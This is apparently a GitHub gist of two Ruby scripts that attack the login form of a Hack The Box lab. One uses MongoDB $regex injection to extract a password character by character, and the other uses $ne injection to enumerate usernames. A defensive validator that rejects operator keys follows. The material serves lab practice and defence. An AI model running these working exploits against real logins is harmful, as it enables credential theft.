@LevitatingBusinessMan
Last active August 21, 2020 23:57
NoSQL exploits for HTB
#!/usr/bin/ruby
# Character-by-character password extraction through a $regex operator in the
# login form: a 302 redirect means the prefix matched, a 200 means it did not.
require 'net/http'
require 'uri'

user = ARGV[0] || "mango"
puts "Attacking #{user}"

#chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".split ""
#i = 0
i = 32      # start at the first printable ASCII character (space)
known = ""  # prefix recovered so far, each character wrapped in [ ] as a regex class
while true
  uri = URI "http://staging-order.mango.htb/"
  #query = known + chars[i]
  query = "#{known}[#{i.chr}]"
  params = {
    "username" => user,
    "password[$regex]" => "^#{query}"
  }
  res = Net::HTTP.post_form(uri, params)
  if res.code == "302"
    i = 31  # the i += 1 below restarts the next position at 32 (space)
    print "\r#{query.gsub(/\[(.)\]/, '\1')}"  # show the prefix without the [ ] wrappers
    known = query
  end
  puts "\n#{res.code} with #{query}" if res.code != "302" && res.code != "200"
  i += 1
  #if i >= chars.length
  if i >= 128
    puts " no further char found"
    exit
  end
end
# Second script in the gist: username enumeration through a $ne operator.
# A username exists when {"password" => {"$ne" => "foo"}} still matches a
# document, which the application signals with a 302 redirect.
require 'net/http'
require 'uri'

abort "Yo we need a wordlist bro" if ARGV.length < 1
wordlist = File.read(ARGV[0]).force_encoding("iso-8859-1").split "\n"
puts "#{wordlist.length} words"

i = 0
for word in wordlist
  uri = URI "http://staging-order.mango.htb/"
  params = {
    "username" => word,
    "password[$ne]" => "foo"
  }
  res = Net::HTTP.post_form(uri, params)
  puts "Found username #{word}" if res.code == "302"
  puts "#{word} resulted in #{res.code}" if res.code != "200" && res.code != "302"
  i += 1
  print("\r#{i}/#{wordlist.length}")
end
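Both scripts work because bracketed form keys such as `password[$ne]` are turned into nested hashes by the server's form parser and then passed straight into a MongoDB query. The following is an added defender-side check, not part of the gist: a small bracket-aware form parser (written here to mimic that framework behaviour, not any particular library) plus a validator that refuses operator keys and only accepts scalar string credentials. The field names `username` and `password` are taken from the scripts above.

```ruby
require 'uri'

# Parse "a=1&b[c]=2" into {"a"=>"1", "b"=>{"c"=>"2"}}, the way bracket-aware
# form parsers do. One nesting level is enough to show the injection shape.
def parse_form(body)
  params = {}
  URI.decode_www_form(body).each do |key, value|
    if (m = key.match(/\A([^\[\]]+)\[([^\[\]]*)\]\z/))
      (params[m[1]] ||= {})[m[2]] = value
    else
      params[key] = value
    end
  end
  params
end

# Names of params whose value is a Hash with a key starting with "$",
# i.e. a MongoDB query operator smuggled in through the form.
def operator_keys(params)
  params.select do |_, v|
    v.is_a?(Hash) && v.keys.any? { |k| k.to_s.start_with?('$') }
  end.keys
end

# Return plain String credentials so the driver can only do an equality
# match; reject operator objects and anything that is not a scalar string.
def safe_credentials(params)
  bad = operator_keys(params)
  raise ArgumentError, "operator injection in #{bad.join(', ')}" unless bad.empty?
  username = params['username']
  password = params['password']
  unless username.is_a?(String) && password.is_a?(String)
    raise ArgumentError, 'credentials must be strings'
  end
  { 'username' => username, 'password' => password }
end

if __FILE__ == $0
  # Constructed sample bodies: a normal login and the two injected forms.
  ["username=admin&password=hunter2",
   "username=admin&password[$ne]=foo",
   "username=mango&password[$regex]=^h"].each do |body|
    begin
      puts "#{body.inspect} -> #{safe_credentials(parse_form(body)).inspect}"
    rescue ArgumentError => e
      puts "#{body.inspect} -> rejected (#{e.message})"
    end
  end
end
```

The same check belongs in front of any query that interpolates request parameters; a structural log line on each rejection also gives a cheap detection signal for the enumeration pattern above.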